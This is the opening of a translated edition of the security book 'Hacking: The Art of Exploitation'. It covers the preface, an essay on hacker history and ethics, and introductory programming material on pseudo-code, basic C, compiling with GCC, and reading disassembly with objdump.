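Hacking: The Art of Exploitation, 2nd Edition (Complete)

Original: Hacking: The Art of Exploitation, 2nd Edition

Translator: 飞龙

License: CC BY-NC-SA 4.0

Preface

The goal of this book is to share the art of hacking with everyone. Understanding hacking techniques is often difficult because it requires both breadth and depth of knowledge. Many hacking texts seem esoteric and confusing simply because of a few gaps in the reader's prerequisite education. This second edition of Hacking: The Art of Exploitation makes the world of hacking more accessible by providing the complete picture, from programming to machine code to exploitation. In addition, this edition includes a bootable LiveCD based on Ubuntu Linux that can be used on any computer with an x86 processor without modifying the computer's existing operating system. The CD contains all the source code in the book and provides a development and exploitation environment you can use to follow along with the book's examples and experiment along the way.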

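Chapter 0x100. Introduction

The idea of hacking may conjure stylized images of electronic vandalism, espionage, dyed hair, and body piercings. Most people associate hacking with breaking the law and assume that everyone who engages in hacking is a criminal. Granted, there are people who use hacking techniques to break the law, but hacking isn't really about that. In fact, hacking is more about following the law than breaking it. The essence of hacking is finding unintended or overlooked uses for the laws and properties of a given situation and then applying them in new and inventive ways to solve a problem, whatever it may be.

The following math problem illustrates the essence of hacking:

Use each of the numbers 1, 3, 4, and 6 exactly once with any of the four basic math operations (addition, subtraction, multiplication, and division) to total 24. Each number must be used once and only once, and you may define the order of operations; for example, 3 * (4 + 6) + 1 = 31 is valid, however incorrect, since it doesn't total 24.

The rules for this problem are well defined and simple, yet the answer eludes many. Like the solution to this problem (shown on the last page of this book), hacked solutions follow the rules of the system, but they use those rules in counterintuitive ways. This gives hackers their edge, allowing them to solve problems in ways unimaginable to those confined to conventional thinking and methodologies.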

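Since the infancy of computers, hackers have been creatively solving problems. In the late 1950s, the MIT model railroad club was given a donation of parts, mostly old telephone equipment. The club's members used this equipment to rig up a complex system that allowed multiple operators to control different parts of the track by dialing in to the appropriate sections. They called this new and inventive use of telephone equipment hacking; many people consider this group to be the original hackers. The group moved on to programming on punch cards and ticker tape for early computers like the IBM 704 and the TX-0. While others were content with writing programs that just solved problems, the early hackers were obsessed with writing programs that solved problems well. A new program that could achieve the same result as an existing one but used fewer punch cards was considered better, even though it did the same thing. The key difference was how the program achieved its results: elegance.

Being able to reduce the number of punch cards needed for a program showed an artistic mastery over the computer. A nicely crafted table can hold a vase just as well as a milk crate can, but one sure looks a lot better than the other. Early hackers proved that technical problems can have artistic solutions, and they thereby transformed programming from a mere engineering task into an art form.

Like many other forms of art, hacking was often misunderstood. The few who got it formed an informal subculture that remained intensely focused on learning and mastering their art. They believed that information should be free and that anything standing in the way of that freedom should be circumvented. Such obstructions included authority figures, the bureaucracy of college classes, and discrimination. In a sea of graduation-driven students, this unofficial group of hackers defied conventional goals and instead pursued knowledge itself. This drive to continually learn and explore transcended even the conventional boundaries drawn by discrimination, evident in the MIT model railroad club's acceptance of 12-year-old Peter Deutsch when he demonstrated his knowledge of the TX-0 and his desire to learn. Age, race, gender, appearance, academic degrees, and social status were not primary criteria for judging another's worth, not because of a desire for equality, but because of a desire to advance the emerging art of hacking.

The original hackers found splendor and elegance in the conventionally dry sciences of math and electronics. They saw programming as a form of artistic expression and the computer as an instrument of that art. Their desire to dissect and understand wasn't intended to demystify artistic endeavors; it was simply a way to achieve a greater appreciation of them. These knowledge-driven values would eventually be called the Hacker Ethic: the appreciation of logic as an art form and the promotion of the free flow of information, surmounting conventional boundaries and restrictions for the simple goal of better understanding the world. This is not a new cultural trend; the Pythagoreans in ancient Greece had a similar ethic and subculture, despite not owning computers. They saw beauty in mathematics and discovered many core concepts in geometry. That thirst for knowledge and its beneficial byproducts would continue on through history, from the Pythagoreans to Ada Lovelace to Alan Turing to the hackers of the MIT model railroad club. Modern hackers like Richard Stallman and Steve Wozniak have continued the hacking legacy, bringing us modern operating systems, programming languages, personal computers, and many other technologies that we use every day.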

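How does one distinguish between the good hackers who bring us the wonders of technological advancement and the evil hackers who steal our credit card numbers? The term cracker was coined to distinguish evil hackers from good ones. Journalists were told that crackers were supposed to be the bad guys, while hackers were the good guys. Hackers stayed true to the Hacker Ethic, while crackers were only interested in breaking the law and making a quick buck. Crackers were considered to be much less talented than the elite hackers, as they simply made use of hacker-written tools and scripts without understanding how they worked. Cracker was meant to be the catch-all label for anyone doing anything unscrupulous with a computer: pirating software, defacing websites, and worst of all, not understanding what they were doing. But very few people use this term today.

The term's lack of popularity might be due to its confusing etymology: cracker originally described those who crack software copyrights and reverse engineer copy-protection schemes. Its current unpopularity might simply result from its two ambiguous new definitions: a group of people who engage in illegal activity with computers, or people who are relatively unskilled hackers. Few technology journalists feel compelled to use terms that most of their readers are unfamiliar with. In contrast, most people are aware of the mystery and skill associated with the term hacker, so for a journalist, the decision to use the term hacker is easy. Similarly, the term script kiddie is sometimes used to refer to crackers, but it just doesn't have the same zing as the shadowy hacker. There are some who will still argue that there is a distinct line between hackers and crackers, but I believe that anyone who has the hacker spirit is a hacker, despite any laws he or she may break.

The current laws restricting cryptography and cryptographic research further blur the line between hackers and crackers. In 2001, Professor Edward Felten and his research team from Princeton University were about to publish a paper that discussed the weaknesses of various digital watermarking schemes. This paper responded to a challenge issued by the Secure Digital Music Initiative (SDMI) in the SDMI Public Challenge, which encouraged the public to attempt to break these watermarking schemes. Before Felten and his team could publish the paper, though, they were threatened by both the SDMI Foundation and the Recording Industry Association of America (RIAA). The Digital Millennium Copyright Act (DMCA) of 1998 makes it illegal to discuss or provide technology that might be used to bypass industry consumer controls. This same law was used against Dmitry Sklyarov, a Russian computer programmer and hacker. He had written software to circumvent overly simplistic encryption in Adobe software and presented his findings at a hacker convention in the United States. The FBI swooped in and arrested him, leading to a lengthy legal battle. Under the law, the complexity of the industry consumer controls doesn't matter: it would be technically illegal to reverse engineer or even discuss Pig Latin if it were used as an industry consumer control. Who are the hackers and who are the crackers now? When laws seem to interfere with free speech, do the good guys who speak their minds suddenly become bad? I believe that the spirit of the hacker transcends governmental laws, as opposed to being defined by them.

The sciences of nuclear physics and biochemistry can be used to kill, yet they also provide us with significant scientific advancement and modern medicine. There's nothing good or bad about knowledge itself; morality lies in the application of knowledge. Even if we wanted to, we couldn't suppress the knowledge of how to convert matter into energy or stop the continued technological progress of society. In the same way, the hacker spirit can never be stopped, nor can it be easily categorized or dissected. Hackers will constantly be pushing the limits of knowledge and acceptable behavior, forcing us to explore further and further.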

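Part of this drive results in an ultimately beneficial co-evolution of security through competition between attacking hackers and defending hackers. Just as the speedy gazelle adapted from being chased by the cheetah, and the cheetah became even faster from chasing the gazelle, the competition between hackers provides computer users with better and stronger security, as well as more complex and sophisticated attack techniques. The introduction and progression of intrusion detection systems (IDSs) is a prime example of this co-evolutionary process. The defending hackers create IDSs to add to their arsenal, while the attacking hackers develop IDS-evasion techniques, which are eventually compensated for in bigger and better IDS products. The net result of this interaction is positive, as it produces smarter people, improved security, more stable software, inventive problem-solving techniques, and even a new economy.

The intent of this book is to teach you about the true spirit of hacking. We will look at various hacker techniques, from the past to the present, dissecting them to learn how and why they work. Included with this book is a bootable LiveCD containing all the source code used herein as well as a preconfigured Linux environment. Exploration and innovation are critical to the art of hacking, so this CD will let you follow along and experiment on your own. The only requirement is an x86 processor, which is used by all Microsoft Windows machines and the newer Macintosh computers; just insert the CD and reboot. This alternate Linux environment will not disturb your existing OS, so when you're done, just reboot again and remove the CD. This way, you will gain a hands-on understanding of and appreciation for hacking that may inspire you to improve upon existing techniques or even to invent new ones. Hopefully, this book will stimulate the curious hacker nature in you and prompt you to contribute to the art of hacking in some way, regardless of which side of the fence you choose to be on.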

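Chapter 0x200. Programming

Hacker is a term for both those who write code and those who exploit it. Even though these two groups of hackers have different end goals, both groups use similar problem-solving techniques. Since an understanding of programming helps those who exploit, and an understanding of exploitation helps those who program, many hackers do both. There are interesting hacks found in both the techniques used to write elegant code and the techniques used to exploit programs. Hacking is really just the act of finding a clever and counterintuitive solution to a problem.

The hacks found in program exploits usually use the rules of the computer to bypass security in ways never intended. Programming hacks are similar in that they also use the rules of the computer in new and inventive ways, but the final goal is efficiency or smaller source code, not necessarily a security compromise. There are actually an infinite number of programs that can be written to accomplish any given task, but most of these solutions are unnecessarily large, complex, and sloppy. The few solutions that remain are small, efficient, and neat. Programs that have these qualities are said to have elegance, and the clever and inventive solutions that tend to lead to this efficiency are called hacks. Hackers on both sides of programming appreciate both the beauty of elegant code and the ingenuity of clever hacks.

In the business world, more importance is placed on churning out functional code than on achieving clever hacks and elegance. Because of the tremendous exponential growth of computational power and memory, spending an extra five hours to create a slightly faster and more memory-efficient piece of code just doesn't make business sense when dealing with modern computers that have gigahertz of processing cycles and gigabytes of memory. While time and memory optimizations go unnoticed by all but the most sophisticated users, a new feature is marketable. When the bottom line is money, spending time on clever hacks for optimization just doesn't make sense.

True appreciation of programming elegance is left for the hackers: computer hobbyists whose end goal isn't to make a profit but to squeeze every possible bit of functionality out of their old Commodore 64s, exploit writers who need to write tiny and amazing pieces of code to slip through narrow security cracks, and anyone else who appreciates the pursuit and the challenge of finding the best possible solution. These are the people who get excited about programming and really appreciate the beauty of an elegant piece of code or the ingenuity of a clever hack. Since an understanding of programming is a prerequisite to understanding how programs can be exploited, programming is a natural starting point.

What Is Programming?

Programming is a very natural and intuitive concept. A program is nothing more than a series of statements written in a specific language. Programs are everywhere, and even the technophobes of the world use programs every day. Driving directions, cooking recipes, football plays, and DNA are all types of programs. A typical program for driving directions might look something like this: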

Start out down Main Street headed east. Continue on Main Street until you see
a church on your right. If the street is blocked because of construction, turn
right there at 15th Street, turn left on Pine Street, and then turn right on
16th Street. Otherwise, you can just continue and make a right on 16th Street.
Continue on 16th Street, and turn left onto Destination Road. Drive straight
down Destination Road for 5 miles, and then you'll see the house on the right.
The address is 743 Destination Road.

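Anyone who knows English can understand and follow these driving directions, since they're written in English. Granted, they're not eloquent, but each instruction is clear and easy to understand, at least for someone who reads English.

But a computer doesn't natively understand English; it only understands machine language. To instruct a computer to do something, the instructions must be written in its language. However, machine language is arcane and difficult to work with: it consists of raw bits and bytes, and it differs from architecture to architecture. To write a program in machine language for an Intel x86 processor, you would have to figure out the value associated with each instruction, how each instruction interacts, and myriad low-level details. Programming like this is painstaking and cumbersome, and it is certainly not intuitive.

What's needed to overcome the complication of writing machine language is a translator. An assembler is one form of machine-language translator: it is a program that translates assembly language into machine-readable code. Assembly language is less cryptic than machine language, since it uses names for the different instructions and variables instead of just numbers. However, assembly language is still far from intuitive. The instruction names are very esoteric, and the language is architecture specific. Just as machine language for Intel x86 processors is different from machine language for Sparc processors, x86 assembly language is different from Sparc assembly language. A program written in assembly language for one processor's architecture will not work on another processor's architecture. If a program is written in x86 assembly language, it must be rewritten to run on the Sparc architecture. In addition, in order to write an effective program in assembly language, you must still know many low-level details of the processor architecture you are writing for.

These problems can be mitigated by yet another form of translator called a compiler. A compiler converts a high-level language into machine language. High-level languages are much more intuitive than assembly language and can be converted into many different types of machine language for different processor architectures. This means that if a program is written in a high-level language, the program only needs to be written once; the same piece of program code can be compiled into machine language for various specific architectures. C, C++, and Fortran are all examples of high-level languages. A program written in a high-level language is much more readable and English-like than assembly language or machine language, but it still must follow very strict rules about how the instructions are worded, or the compiler won't be able to understand it.

Pseudo-code

Programmers have yet another form of programming language called pseudo-code. Pseudo-code is simply English arranged with a general structure similar to a high-level language. It isn't understood by compilers, assemblers, or any computers, but it is a useful way for a programmer to arrange instructions. Pseudo-code isn't well defined; in fact, most people write pseudo-code slightly differently. It's sort of the nebulous missing link between English and high-level programming languages like C. Pseudo-code makes for an excellent introduction to common universal programming concepts.

Control Structures

Without control structures, a program would just be a series of instructions executed in sequential order. This is fine for very simple programs, but most programs, like the driving directions example, aren't that simple. The driving directions included statements like Continue on Main Street until you see a church on your right and If the street is blocked because of construction.... These statements are known as control structures, and they change the flow of the program's execution from a simple sequential order to a more complex and more useful flow.

If-Then-Else

In the case of our driving directions, Main Street could be under construction. If it is, a special set of instructions needs to address that situation. Otherwise, the original set of instructions should be followed. These types of special cases can be accounted for in a program with one of the most natural control structures: the if-then-else structure. In general, it looks something like this: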

If (condition) then
{
  Set of instructions to execute if the condition is met;
}
Else
{
  Set of instructions to execute if the condition is not met;
}

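For this book, a C-like pseudo-code will be used, so every instruction will end with a semicolon, and the sets of instructions will be grouped with curly braces and indentation. The if-then-else pseudo-code structure of the preceding driving directions might look something like this: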

Drive down Main Street;
If (street is blocked)
{
  Turn right on 15th Street;
  Turn left on Pine Street;
  Turn right on 16th Street;
}
Else
{
  Turn right on 16th Street;
}

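Each instruction is on its own line, and the various sets of conditional instructions are grouped between curly braces and indented for readability. In C and many other programming languages, the then keyword is implied and therefore left out, so it has also been omitted in the preceding pseudo-code.

Of course, other languages require the then keyword in their syntax: BASIC, Fortran, and Pascal, for example. These types of syntactical differences in programming languages are only skin deep; the underlying structure is still the same. Once a programmer understands the concepts these languages are trying to convey, learning the various syntactical variations is fairly trivial. Since C will be used in the later sections, the pseudo-code used in this book will follow a C-like syntax, but remember that pseudo-code can take on many forms.

Another common rule of C-like syntax is that when a set of instructions bounded by curly braces consists of just one instruction, the curly braces are optional. For the sake of readability, it's still a good idea to indent these instructions, but it's not syntactically necessary. The driving directions from before can be rewritten following this rule to produce an equivalent piece of pseudo-code: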

Drive down Main Street;
If (street is blocked)
{
  Turn right on 15th Street;
  Turn left on Pine Street;
  Turn right on 16th Street;
}
Else
  Turn right on 16th Street;

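This rule about sets of instructions holds true for all of the control structures mentioned in this book, and the rule itself can be described in pseudo-code.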

If (there is only one instruction in a set of instructions)
  The use of curly braces to group the instructions is optional;
Else
{
  The use of curly braces is necessary;
  Since there must be a logical way to group these instructions;
}

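Even the description of a syntax itself can be thought of as a simple program. There are variations of if-then-else, such as select/case statements, but the logic is still basically the same: if this happens do these things, otherwise do these other things (which could consist of even more if-then statements).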

While/Until Loops

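Another elementary programming concept is the while control structure, which is a type of loop. A programmer will often want to execute a set of instructions more than once. A program can accomplish this task through looping, but it requires a set of conditions that tells it when to stop looping, lest it continue into infinity. A while loop says to execute the following set of instructions in a loop while a condition is true. A simple program for a hungry mouse could look something like this: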

While (you are hungry)
{
  Find some food;
  Eat the food;
}

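The set of two instructions following the while statement will be repeated while the mouse is still hungry. The amount of food the mouse finds each time could range from a tiny crumb to an entire loaf of bread. Similarly, the number of times the set of instructions in the while statement is executed changes depending on how much food the mouse finds.

Another variation on the while loop is an until loop, a syntax that is available in the programming language Perl (C doesn't use this syntax). An until loop is simply a while loop with the conditional statement inverted. The same mouse program using an until loop would be: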

Until (you are not hungry)
{
  Find some food;
  Eat the food;
}

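Logically, any until-like statement can be converted into a while loop. The driving directions from before contained the statement Continue on Main Street until you see a church on your right. This can easily be changed into a standard while loop by simply inverting the condition.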

While (there is not a church on the right)
   Drive down Main Street;

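For Loops

Another looping control structure is the for loop. This is generally used when a programmer wants to loop for a certain number of iterations. The driving direction Drive straight down Destination Road for 5 miles could be converted to a for loop that looks something like this: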

For (5 iterations)
  Drive straight for 1 mile;

In reality, a for loop is just a while loop with a counter. The same statement can be written as such:

Set the counter to 0;
While (the counter is less than 5)
{
  Drive straight for 1 mile;
  Add 1 to the counter;
}

The C-like pseudo-code syntax of a for loop makes this even more apparent:

For (i=0; i<5; i++)
  Drive straight for 1 mile;

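In this case, the counter is called i, and the for statement is broken up into three sections, separated by semicolons. The first section declares the counter and sets it to its initial value, in this case 0. The second section is like a while statement using the counter: while the counter meets this condition, keep looping. The third and final section describes what action should be taken on the counter during each iteration. In this case, i++ is a shorthand way of saying Add 1 to the counter called i.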

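Using all of the control structures, the driving directions from What Is Programming? can be converted into a C-like pseudo-code that looks something like this: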

Begin going East on Main Street;
While (there is not a church on the right)
  Drive down Main Street;
If (street is blocked)
{
  Turn right on 15th Street;
  Turn left on Pine Street;
  Turn right on 16th Street;
}
Else
  Turn right on 16th Street;
Turn left on Destination Road;
For (i=0; i<5; i++)
  Drive straight for 1 mile;
Stop at 743 Destination Road;

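More Fundamental Programming Concepts

In the following sections, more universal programming concepts will be introduced. These concepts are used in many programming languages, with a few syntactical differences. As I introduce these concepts, I will integrate them into pseudo-code examples using C-like syntax. By the end, the pseudo-code should look very similar to C code.

Variables

The counter used in the for loop is actually a type of variable. A variable can simply be thought of as an object that holds data that can be changed, hence the name. There are also variables that don't change, which are aptly called constants. Returning to the driving example, the speed of the car would be a variable, while the color of the car would be a constant. In pseudo-code, variables are simple abstract concepts, but in C (and in many other languages), variables must be declared and given a type before they can be used. This is because a C program will eventually be compiled into an executable program. Like a cooking recipe that lists all the required ingredients before giving the instructions, variable declarations allow you to make preparations before getting into the meat of the program. Ultimately, all variables are stored in memory somewhere, and their declarations allow the compiler to organize this memory more efficiently. In the end though, despite all of the variable type declarations, everything is just memory.

In C, each variable is given a type that describes the information that is meant to be stored in that variable. Some of the most common types are int (integer values), float (decimal floating-point values), and char (single character values). Variables are declared simply by using these keywords before listing the variables, as you can see below.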

int a, b;
float k;
char z;

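The variables a and b are now defined as integers, k can accept floating-point values (such as 3.14), and z is expected to hold a character value, like A or w. Variables can be assigned values when they are declared or anytime afterward, using the = operator.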

int a = 13, b;
float k;
char z = 'A';

k = 3.14;
z = 'w';
b = a + 5;

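After the preceding instructions have been carried out, the variable a will contain the value 13, k will contain the number 3.14, z will contain the character w, and b will contain the value 18, since 13 plus 5 equals 18. Variables are simply a way to remember values; however, with C, you must first declare each variable's type.

Arithmetic Operators

The statement b = a + 7 is an example of a very simple arithmetic operator. In C, the following symbols are used for various arithmetic operations.

Operation	Symbol	Example
Addition	+	`b = a + 5`
Subtraction	-	`b = a - 5`
Multiplication	*	`b = a * 5`
Division	/	`b = a / 5`
Modulo reduction	%	`b = a % 5`

The first four operations should look familiar. Modulo reduction may seem like a new concept, but it's really just taking the remainder after division. If a is 13, then 13 divided by 5 equals 2, with a remainder of 3, which means that a % 5 = 3. Also, since the variables a and b are integers, the statement b = a / 5 will result in the value of 2 being stored in b, since that's the integer portion of it. Floating-point variables must be used to retain the more correct answer of 2.6.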

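To get a program to use these concepts, you must speak its language. The C language also provides several forms of shorthand for these arithmetic operations. One of these was mentioned earlier and is used commonly in for loops.

Full Expression	Shorthand	Explanation
`i = i + 1`	`i++` or `++i`	Add 1 to the variable.
`i = i - 1`	`i--` or `--i`	Subtract 1 from the variable.

These shorthand expressions can be combined with other arithmetic operations to produce more complex expressions. This is where the difference between i++ and ++i becomes apparent. The first expression means Increment the value of i by 1 after evaluating the arithmetic operation, while the second expression means Increment the value of i by 1 before evaluating the arithmetic operation. The following example will help clarify.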

int a, b;
a = 5;
b = a++ * 6;

At the end of this set of instructions, b will contain 30 and a will contain 6, since the shorthand of b = a++ * 6; is equivalent to the following statements:

b = a * 6;
a = a + 1;

However, if the instruction b = ++a * 6; is used, the order of the addition to a changes, resulting in the following equivalent instructions:

a = a + 1;
b = a * 6;

Since the order has changed, in this case b will contain 36, and a will still contain 6.

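Quite often in programs, variables need to be modified in place. For example, you might need to add an arbitrary value like 12 to a variable and store the result right back in that variable (for example, i = i + 12). This happens commonly enough that shorthand also exists for it.

Full Expression	Shorthand	Explanation
`i = i + 12`	`i+=12`	Add some value to the variable.
`i = i - 12`	`i-=12`	Subtract some value from the variable.
`i = i * 12`	`i*=12`	Multiply the variable by some value.
`i = i / 12`	`i/=12`	Divide the variable by some value.

Comparison Operators

Variables are frequently used in the conditional statements of the previously explained control structures. These conditional statements are based on some sort of comparison. In C, these comparison operators use a shorthand syntax that is fairly common across many programming languages.

Condition	Symbol	Example
Less than	<	`(a < b)`
Greater than	>	`(a > b)`
Less than or equal to	<=	`(a <= b)`
Greater than or equal to	>=	`(a >= b)`
Equal to	==	`(a == b)`
Not equal to	!=	`(a != b)`

Most of these operators are self-explanatory; however, notice that the shorthand for equal to uses double equal signs. This is an important distinction, since the double equal sign is used to test equivalence, while the single equal sign is used to assign a value to a variable. The statement a = 7 means Put the value 7 in the variable a, while a == 7 means Check to see whether the variable a is equal to 7. (Some programming languages like Pascal actually use := for variable assignment to eliminate visual confusion.) Also, notice that an exclamation point generally means not. This symbol can be used by itself to invert any expression.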

!(a < b)    is equivalent to    (a >= b)

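These comparison operators can also be chained together using shorthand for OR and AND.

Logic	Symbol	Example
OR	||	`((a < b) || (a < c))`
AND	&&	`((a < b) && !(a < c))`

The example statement consisting of the two smaller conditions joined with OR logic will fire true if a is less than b, OR if a is less than c. Similarly, the example statement consisting of two smaller comparisons joined with AND logic will fire true if a is less than b AND a is not less than c. These statements should be grouped with parentheses and can contain many different variations.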

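Many things can be boiled down to variables, comparison operators, and control structures. Returning to the example of the mouse searching for food, hunger can be translated into a Boolean true/false variable. Naturally, 1 means true and 0 means false.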

While (hungry == 1)
{
  Find some food;
  Eat the food;
}

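Here's another shorthand used by programmers and hackers quite often. Classic C has no dedicated Boolean type (C99 later added _Bool), so any nonzero value is considered true, and a statement is considered false if it contains 0. In fact, the comparison operators will actually return a value of 1 if the comparison is true and a value of 0 if it is false. Checking to see whether the variable hungry is equal to 1 will return 1 if hungry equals 1 and 0 if hungry equals 0. Since the program only uses these two cases, the comparison operator can be dropped altogether.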

While (hungry)
{
  Find some food;
  Eat the food;
}

A smarter mouse program with more inputs demonstrates how comparison operators can be combined with variables.

While ((hungry) && !(cat_present))
{
  Find some food;
  If(!(food_is_on_a_mousetrap))
    Eat the food;
}

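This example assumes there are also variables that describe the presence of a cat and the location of the food, with a value of 1 for true and 0 for false. Just remember that any nonzero value is considered true, and the value of 0 is considered false.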

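Functions

Sometimes there will be a set of instructions the programmer knows he will need several times. These instructions can be grouped into a smaller subprogram called a function. In other languages, functions are known as subroutines or procedures. For example, the action of turning a car actually consists of many smaller instructions: turn on the appropriate blinker, slow down, check for oncoming traffic, turn the steering wheel in the appropriate direction, and so on. The driving directions from the beginning of this chapter require quite a few turns; however, listing every little instruction for every turn would be tedious (and less readable). You can pass variables as arguments to a function in order to modify the way the function operates. In this case, the function is passed the direction of the turn.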

Function Turn(variable_direction)
{
  Activate the variable_direction blinker;
  Slow down;
  Check for oncoming traffic;
  while(there is oncoming traffic)
  {
    Stop;
    Watch for oncoming traffic;
  }
  Turn the steering wheel to the variable_direction;
  while(turn is not complete)
  {
    if(speed < 5 mph)
      Accelerate;
  }
  Turn the steering wheel back to the original position;
  Turn off the variable_direction blinker;
}

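This function describes all the instructions needed to make a turn. When a program that knows about this function needs to turn, it can just call this function. When the function is called, the instructions found within it are executed with the arguments passed to it; afterward, execution returns to where it was in the program, after the function call. Either left or right can be passed into this function, which causes the function to turn in that direction.

By default in C, functions can return a value to a caller. For those familiar with functions in mathematics, this makes perfect sense. Imagine a function that calculates the factorial of a number; naturally, it returns the result.

In C, functions aren't labeled with a "function" keyword; instead, they are declared by the data type of the variable they are returning. This format looks very similar to variable declaration. If a function is meant to return an integer (perhaps a function that calculates the factorial of some number x), the function could look like this: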

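int factorial(int x)
{
  int i, result = 1;
  for(i=1; i <= x; i++)   // Multiply together every value from 1 to x.
    result *= i;
  return result;
}

This function is declared as an integer because it multiplies every value from 1 to x and returns the result, which is an integer. The product is accumulated in a separate variable, result, so that the loop bound x is never modified while the loop is running. The return statement at the end of the function passes back the contents of the variable result and ends the function. This factorial function can then be used like an integer variable in the main part of any program that knows about it.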

int a=5, b;
b = factorial(a);

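At the completion of this short program, the variable b will contain 120, since the factorial function will be called with the argument of 5 and will return 120.

Also in C, the compiler must "know" about functions before it can use them. This can be done by simply writing the entire function before using it later in the program or by using function prototypes. A function prototype is simply a way to tell the compiler to expect a function with this name, this return data type, and these data types as its functional arguments. The actual function can be located near the end of the program, but it can be used anywhere else, since the compiler already knows about it. An example of a function prototype for the factorial() function would look something like this: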

int factorial(int);

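Usually, function prototypes are located near the beginning of a program. There's no need to actually define any variable names in the prototype, since this is done in the actual function. The only thing the compiler cares about is the function's name, its return data type, and the data types of its functional arguments.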

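If a function doesn't have any value to return, it should be declared as void, as is the case with the turn() function I used as an example earlier. However, the turn() function doesn't yet capture all the functionality that our driving directions need. Every turn in the directions has both a direction and a street name. This means that a turning function should have two variables: the direction to turn and the street to turn on to. This complicates the function of turning, since the proper street must be located before the turn can be made. A more complete turning function using proper C-like syntax is listed below in pseudo-code.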

void turn(variable_direction, target_street_name)
{
  Look for a street sign;
  current_intersection_name = read street sign name;
  while(current_intersection_name != target_street_name)
  {
    Look for another street sign;
    current_intersection_name = read street sign name;
  }

  Activate the variable_direction blinker;
  Slow down;
  Check for oncoming traffic;
  while(there is oncoming traffic)
  {
    Stop;
    Watch for oncoming traffic;
  }
  Turn the steering wheel to the variable_direction;
  while(turn is not complete)
  {
    if(speed < 5 mph)
      Accelerate;
  }
  Turn the steering wheel right back to the original position;
  Turn off the variable_direction blinker;
}

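This function includes a section that searches for the proper intersection by looking for street signs, reading the name on each street sign, and storing that name in a variable called current_intersection_name. It will continue to look for and read street signs until the target street is found; at that point, the remaining turning instructions will be executed. The pseudo-code driving instructions can now be changed to use this turning function.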

Begin going East on Main Street;
while (there is not a church on the right)
   Drive down Main Street;
if (street is blocked)
{
  turn(right, 15th Street);
  turn(left, Pine Street);
  turn(right, 16th Street);
}
else
  turn(right, 16th Street);
turn(left, Destination Road);
for (i=0; i<5; i++)
  Drive straight for 1 mile;
Stop at 743 Destination Road;

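Functions aren't commonly used in pseudo-code, since pseudo-code is mostly used as a way for programmers to sketch out program concepts before writing compilable code. Since pseudo-code doesn't actually have to work, full functions don't need to be written out; simply jotting down Do some complex stuff here will suffice. But in a programming language like C, functions are used heavily. Most of the real usefulness of C comes from collections of existing functions called libraries.

Getting Your Hands Dirty

Now that the syntax of C feels more familiar and some fundamental programming concepts have been explained, actually programming in C isn't that big of a step. C compilers exist for just about every operating system and processor architecture out there, but for this book, Linux and an x86-based processor will be used exclusively. Linux is a free operating system that everyone has access to, and x86-based processors are the most popular consumer-grade processors on the planet. Since hacking is really about experimenting, it's probably best if you have a C compiler to follow along with.

Included with this book is a LiveCD that you can use to follow along if your computer has an x86 processor. Just put the CD in the drive and reboot your computer. It will boot into a Linux environment without modifying your existing operating system. From this Linux environment you can follow along with the book and experiment on your own.

Let's get right to it. The firstprog.c program is a simple piece of C code that will print "Hello, world!" 10 times.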

firstprog.c

#include <stdio.h>

int main()
{
  int i;
  for(i=0; i < 10; i++)       // Loop 10 times.
  {
    printf("Hello, world!\n");  // Print the string to the output.
  }
  return 0;                   // Tell OS the program exited without errors.
}

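The main execution of a C program begins in the aptly named main() function. Any text following two forward slashes (//) is a comment, which is ignored by the compiler.

The first line may be confusing, but it's just C syntax that tells the compiler to include headers for a standard input/output (I/O) library named stdio. This header file is added to the program when it is compiled. It is located at /usr/include/stdio.h, and it defines several constants and function prototypes for corresponding functions in the standard I/O library. Since the main() function uses the printf() function from the standard I/O library, a function prototype is needed for printf() before it can be used. This function prototype (along with many others) is included in the stdio.h header file. A lot of the power of C comes from its extensibility and libraries. The rest of the code should make sense and look a lot like the pseudo-code from before. You may have even noticed that there's a set of curly braces that can be eliminated. It should be fairly obvious what this program will do, but let's compile it using GCC and run it just to make sure.

The GNU Compiler Collection (GCC) is a free C compiler that translates C into machine language that a processor can understand. The outputted translation is an executable binary file, which is called a.out by default. Does the compiled program do what you thought it would?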

reader@hacking:~/booksrc $ gcc firstprog.c
reader@hacking:~/booksrc $ ls -l a.out
-rwxr-xr-x 1 reader reader 6621 2007-09-06 22:16 a.out
reader@hacking:~/booksrc $ ./a.out
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
reader@hacking:~/booksrc $

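The Bigger Picture

Okay, this has all been stuff you would learn in an elementary programming class: basic, but essential. Most introductory programming classes just teach how to read and write C. Don't get me wrong, being fluent in C is very useful and is enough to make you a decent programmer, but it's only a piece of the bigger picture. Most programmers learn the language from the top down and never see the big picture. Hackers get their edge from knowing how all the pieces interact within this bigger picture. To see the bigger picture in the realm of programming, simply realize that C code is meant to be compiled. The code can't actually do anything until it's compiled into an executable binary file. Thinking of C source as a program is a common misconception that is exploited by hackers every day. The binary a.out's instructions are written in machine language, an elementary language the CPU can understand. Compilers are designed to translate the language of C code into machine language for a variety of processor architectures. In this case, the processor is in a family that uses the x86 architecture. There are also Sparc processor architectures (used in Sun workstations) and the PowerPC processor architecture (used in pre-Intel Macs). Each architecture has a different machine language, so the compiler acts as a middle ground, translating C code into machine language for the target architecture.

As long as the compiled program works, the average programmer is only concerned with source code. But a hacker realizes that the compiled program is what actually gets executed out in the real world. With a better understanding of how the CPU operates, a hacker can manipulate the programs that run on it. We have seen the source code for our first program and compiled it into an executable binary for the x86 architecture. But what does this executable binary look like? The GNU development tools include a program called objdump, which can be used to examine compiled binaries. Let's start by looking at the machine code the main() function was translated into.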

reader@hacking:~/booksrc $ objdump -D a.out | grep -A20 main.:
08048374 <main>:
 8048374:       55                      push   %ebp
 8048375:       89 e5                   mov    %esp,%ebp
 8048377:       83 ec 08                sub    $0x8,%esp
 804837a:       83 e4 f0                and    $0xfffffff0,%esp
 804837d:       b8 00 00 00 00          mov    $0x0,%eax
 8048382:       29 c4                   sub    %eax,%esp
 8048384:       c7 45 fc 00 00 00 00    movl   $0x0,0xfffffffc(%ebp)
 804838b:       83 7d fc 09             cmpl   $0x9,0xfffffffc(%ebp)
 804838f:       7e 02                   jle    8048393 <main+0x1f>
 8048391:       eb 13                   jmp    80483a6 <main+0x32>
 8048393:       c7 04 24 84 84 04 08    movl   $0x8048484,(%esp)
 804839a:       e8 01 ff ff ff          call   80482a0 <printf@plt>
 804839f:       8d 45 fc                lea    0xfffffffc(%ebp),%eax
 80483a2:       ff 00                   incl   (%eax)
 80483a4:       eb e5                   jmp    804838b <main+0x17>
 80483a6:       c9                      leave
 80483a7:       c3                      ret
 80483a8:       90                      nop
 80483a9:       90                      nop
 80483aa:       90                      nop
reader@hacking:~/booksrc $

